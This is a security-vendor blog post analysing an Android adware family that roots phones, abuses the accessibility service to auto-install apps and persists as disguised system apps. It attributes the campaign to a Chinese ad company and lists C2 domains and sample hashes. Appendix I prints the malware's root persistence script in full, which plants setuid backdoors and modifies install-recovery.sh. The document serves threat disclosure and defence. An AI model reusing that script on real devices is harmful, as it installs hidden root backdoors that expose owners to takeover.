Guaranteed Clicks: Mobile App Company Takes Control of Android Phones

general-

FireEye Labs mobile researchers discovered a malicious adware family quickly spreading worldwide that allows for complete takeover of an Android user’s device. This attack is created by a mobile app promotion company called NGE Mobi/Xinyinhe that claims to be valued at more than $100M with offices in China and Singapore.

The malicious adware uses novel techniques to maintain persistence and obfuscate its activity, including installing system level services, modifying the recovery script executed on boot, and even tricking the user into enabling automatic app installation. We have observed over 300 malicious, illegitimate versions of Android apps being distributed, including: Amazon, Memory Booster, Clean Master, PopBird, YTD Video Downloader, and Flashlight.

By taking control of mobile devices via its adware, NGE Mobi is able to “guarantee” downloads of the apps it gets paid to promote. They also generate ad revenue by serving ads via full control of a victim’s device.

The core manner used by NGE Mobi is able to take over Android devices is shown in Figure 1.

Figure 1. Infection process

As shown in Figure 2, the infection range is wide, victims with 308 different phone models from more than 26 countries (and four continents) have been infected.

Figure 2. World infection map

The malicious adware has infected 20 different versions of Android, from 2.3.4 to 5.1.1. This covers almost all versions of Android.

FireEye started to monitor this malware family in August and the number of active, infected devices is still increasing.

In the following sections we provide analysis of this malicious adware family.

How the Malicious Adware Works

As shown in Figure 3, the attackers repackage popular apps and inject malicious logic and ad components into the apps. The samples are continuously evolving. More recent samples have even more powerful obfuscation and packing mechanisms. After propagating to the victim’s phone, the malware unpacks and releases the malicious payload along with the normal components of the repackaged app.

Figure 3. An overview of the malicious adware workflow

First, the malicious adware collects and uploads device information to its remote servers. It iterates the following domains and posts data once a connection is established:

  • aedxdrcb.com
  • hdyfhpoi.com
  • syllyq1n.com
  • wksnkys7.com

The adware encrypts and encodes some of the uploaded data using AES/CBC/NoPadding followed by Base64. None of the uploaded data is critical. It simply includes the device model details, MAC address, IMEI/IMSI, system and software info, and so on.

Next, it downloads an APK and dynamically loads logic to execute

This downloaded APK has the package name “com.dashi.rootmaster.demo” and after being loaded into the original app, it drives the process of rooting the victim’s phone.

After loading this root master, the app extracts a few native executables named “r1”, “r2”, “r3”, “r4”, “r5”, etc, and a shell script called “rsh”. Each “rx” binary corresponds to a root exploit, including but not limited to the following:

  • Framaroot
  • Root exploit targeting Mediatek mt65xx chips
  • put_user exploit
  • Mempodroid

After gaining root, the app executes the “rsh” script. The script is listed in the Appendix for reference. It performs the following actions:

  • Remount /system as writable
  • Implant SU daemon as the root backdoor into /system, and append a line into install-recovery.sh, which executes on boot
  • Set the install-recover.sh as immutable to avoid removal
  • Install APKs into /system partition to consistently and persistently control the victim phone

Now that the app has full control of the phone, it can use the victim’s phone for any purpose. The app never mounts the /system back to read-only, and allows anyone to invoke its root backdoor to obtain root privilege. Any other attackers landing on the same victim phone can control or make permanent damages to the phone. All communications use HTTP, so anyone can hijack the connection and take over the control of this large botnet.

With root privilege on our device, we observed the adware automatically download and install a browser app named “Cool Browser”.

This browser app serves adult content in its own home screen and promote apps on the victims' phones. It also puts pornographic videos and app ads as shortcuts on the phone’s home screen, as shown in Figure 4. It is well known that porn websites and third-party apps outside Google Play may contain malicious code, so this again opened further attack surface on the victim’s phone.Figure 4. The screenshots of “Cool Browser” on home screen and its installed shortcuts

Regardless of whether the rooting process is successful, this malicious adware family utilizes Android Accessibility Service to check if the current window is the Android installation prompt. If so, it will force click the install button.

Figure 5. The screenshots of the added malicious accessibility entries from two different samples

Figure 5 shows the screenshots of the added accessibility entries from two samples of this malicious adware family. The description of the accessibility is totally misleading and does not mention that it will force click the install button. What’s more, the samples themselves lure victims to enable the accessibility entry, as shown in Figure 6.

Figure 6. The sample prompts victim to enable the malicious accessibility service

If the victim follows the instructions and enables the corresponding accessibility service, the installation flow of any app promoted by the samples are automated as follows:

  • If the victim clicks the ad to download an APK and trigger the installation prompt, the malicious accessibility service automatically clicks “install” and “yes” on behalf of the user.
  • If the victim clicks the ad but the ad is pointing to a Google Play link, the malicious accessibility service automatically clicks “install” and “accept” when Android prompts the permission list for user to confirm.

Therefore, even if the samples fail to root the phone, they can still automatically install any app without user consent.

In addition to normal Java code and native code obfuscation, the malicious adware obfuscates itself using the following methods to increase the difficulty of detection and reverse engineering:

It uses packers to pack executables. In the most recent samples, all Java and native components are encrypted and extracted at runtime.

Some payloads are named with dot (“.”) prefix to evade manual analysis. Most payloads are named using meaningless, random strings. Some executables are named to disguise as other file types or even system components.

Once executed, most executables and payloads containing exploits will be removed.

The implanted system services have deceiving package names like “com.android.theme.manages” and “com.android.camera.update”, pretending to be one of the OEM Android system services.

Attacker Analysis

We have gathered 338 samples in the wild that fall into this malicious adware family. Table 1 lists the certificates signing most of the samples:

Certificate Info

Number of Samples

Percentage

CN=google, OU=google, O=android, C=CN

105

31.07%

CN=ngsteam, OU=ngsteam, O=xinyinhe, C=CN

72

21.30%

CN=Unknown, OU=Unknown, O=Unknown, L=Unknown, ST=Unknown, C=Unknown

57

16.86%

Table 1. Certificate info and stats among our collected samples

Our analysis revealed the following information:

  • There are simplified Chinese characters and Chinese pinyin in the code, so the attacker may be coming from China.
  • One of the popular certificate has the CN field as “ngsteam” (“ng” stands for “New Galaxy”, the English translation of “xinyinhe”) and the O field is “xinyinhe”.
  • The root exploit payload, Root Master, has someone with email in xinyinhe.com domain participating in the developing.
  • xinyinhe.com has a subdomain named root.xinyinhe.com, serving root tools similar to the payload used in the samples.

This evidence points to the Chinese mobile ad promotion company, xinyinhe (with their official website hosted at www[.]xinyinhe[.]com and www[.]ngemobi[.]com. The first website was  taken down before we wrote this blog, and the second got taken down while drafting this post).

We obtained this company’s app repackaging tool in Figure 3 and the private key corresponding to the first certificate in Table 1 on a server without authentication protection. This is key evidence that proves that this Chinese company is behind the infections.

The following text was pulled from their website:

“Founded on June 21, 2013, the company has extended its business and built branch offices in Beijing, Shenzhen, Shanghai, and Singapore. In November 2014, we were invested 20 million dollars by Legend Capital with 100 million dollars valuation. Just in one year, the company has received great reputation and investment, which created the miraculous 50 times increase.”

“Optimized operation methods and users guarantee releasing the games easily. Release to users in 50 countries and support payments to 170 countries worldwide.”

“Long term cooperation with more than 120 Content Providers. Perfect product localization team provide the translation, polishing, beautification, optimization etc. which will quickly make your application fit for overseas customers.”

It appears that the company spent lots of effort and resources on marketing and promotion, explaining why the infection is so global. Consequently, the large number of infected phones is also helping the company grow.

Our investigation shows that the samples have been propagated via numerous channels. The major channel is through the giant ad cooperative network that xinyinhe participates in (ad vendors in the network promote services and products for each other). We also witnessed a few posts on popular social networks (Facebook, Twitter, etc.) with adult content containing links to xinyinhe samples.

Conclusion

This is a worldwide, spreading malicious adware family with a high threat, likely controlled by a Chinese organization. We suggest that you:

  • Never click on suspicious links from emails/SMS/websites/advertisements.
  • Don’t install apps outside the official app store.
  • Keep Android devices updated to avoid being rooted by public known bugs. (Note: The malware can not root devices with Android OS 5.0 and above, as of now. However, because the root program is downloaded on runtime, we cannot rule out the possibility that the attackers can enhance the root programs. So, upgrading to the latest version of OS will provide some security but is not a guarantee that you will remain completely safe from this malware.)

To detect and defend against such attacks, we advise our customers to deploy a mobile security solution to gain visibility of threats in their user base, and proactively hunt down devices that have been compromised. In addition, we advise our customers with NX appliances to ensure that WiFi traffic is scanned by NX appliances to extend coverage to mobile devices.

Any affected user may have inadvertently compromised their user credentials for some online services. We recommend those users change their passwords for any online services such as iTunes, online banking, email, and work accounts.

Appendix I.  Shell Script Executed by One of the Samples

#!/system/bin/sh
PATH='/system/bin';
mount -o remount,rw /system;
mount -o remount rw /system;
echo -e '/system/bin/daemonuis --auto-daemon &' >> /system/etc/install-recovery.sh
chmod 755 /system/etc/install-recovery.sh;
cat /data/data/com.locker.maboo.tow/app_libo/uis > /system/bin/uis;
cat /system/bin/uis > /system/bin/daemonuis;
chmod 6777 /system/bin/daemonuis;
chown 0.0 /system/bin/daemonuis;
chown 0.0 /system/bin/uis;
chmod 6777 /system/bin/uis;
mount -o remount,rw /system;
mount -o remount rw /system;
/data/data/com.locker.maboo.tow/files/.sys.apk -i -a /system/etc/install-recovery.sh;
echo -e '#!/system/bin/sh; /system/xbin/.ext.base &' >> /system/etc/install-recovery.sh;
chmod 755 /system/etc/install-recovery.sh;
/data/data/com.locker.maboo.tow/files/.sys.apk +i +a /system/etc/install-recovery.sh;
cat /data/data/com.locker.maboo.tow/files/.service > /system/xbin/.ext.base;
chown 0.0 /system/xbin/.ext.base;
chmod 6777 /system/xbin/.ext.base;
cat /data/data/com.locker.maboo.tow/files/.client > /system/xbin/.b;
chown 0.0 /system/xbin/.b;
chmod 6777 /system/xbin/.b;
cat /data/data/com.locker.maboo.tow/files/.df > /system/xbin/.df;
chmod 777 /system/xbin/.df;
chmod 777 /data/data/com.locker.maboo.tow/files/.center.tapk;
touch /system/app/cameraupdate.apk;
chown 0.0 /system/app/cameraupdate.apk;
chmod  0644 /system/app/cameraupdate.apk;
cat /data/data/com.locker.maboo.tow/files/.center.tapk > /system/app/cameraupdate.apk;
pm disable com.android.camera.update;
sleep 1;
pm enable com.android.camera.update;
cat /data/data/com.locker.maboo.tow/files/.sys.apk>/system/xbin/.sys.apk;
chmod 777 /system/xbin/.sys.apk;
/data/data/com.locker.maboo.tow/files/.sys.apk +i +a /system/xbin/.sys.apk;
chmod 777 /data/data/com.locker.maboo.tow/files/.dlme.apk;
touch /system/app/ThemeManags.apk;
chown 0.0 /system/app/ThemeManags.apk;
chmod 0644 /system/app/ThemeManags.apk;
cat /data/data/com.locker.maboo.tow/files/.dlme.apk > /system/app/ThemeManags.apk;
pm disable com.android.theme.manages;
sleep 1;
pm enable com.android.theme.manages;
chmod 777 /data/data/com.locker.maboo.tow/files/.dler.apk;
pm install -r /data/data/com.locker.maboo.tow/files/.dler.apk;

Appendix II.  Examples of Some Samples

Package Name: com.locker.maboo.tow
SHA256: 12b8da40ec9e53a83a7c4b1d490db397730123efa5e8ed39ee596d3bae42f80d

Package Name: com.tmdfkslakssspp111.ivityfffds1133
SHA256: 8b5b898c7ad2fc6b516800f411b7181877a89124a94ba8a9fa0e974972c67553

Package Name: com1.xiaoao2.FruitSingle
SHA256: d65696c077b480bb0afab2390f1efd37d701ca2f6cbaa91977d4ac76957438c7

Package Name: com.mobilefish.pig.enpais
SHA256: 3a5bbe5454124ba5fbaa0dc7786fd2361dd903f84ccf65be65b0b0b77d432e6e

Package Name: com.adad.flashlight
SHA256: b05013bbabf0a24a2c8b9c7b3f3ad79b065c6daaaec51c2e61790b05932dbb58

Package Name: com.liuximnb.videokl2
396324dc3f34785aca1ece255a6f142f52e831b22bf96906c2a10b61b1da4713

Package Name: com.4puBX.Bu1q0
SHA256: 98bdad683b0ae189ed0fa56fb1e147c93e96e085dff90565ee246a4f6c4e2850

Package Name: com.sQ1z7.JXhkN
SHA256: f46c21a2976af7ba23e0af54943eacdaad2fd0b3108fde6d1502879fe9c83d07

Package Name: com.cg.wifienhancer
SHA256: b3c3d131200369d1c28285010b99d591f9a9c0629b0ba9fedd1b4ffe0170cf4c

Package Name: com.BmiZX.p6l9v
SHA256: 0a63ca301d97930eb8352c0772fb39015e4b89cd82e72391213ee82414e60cf8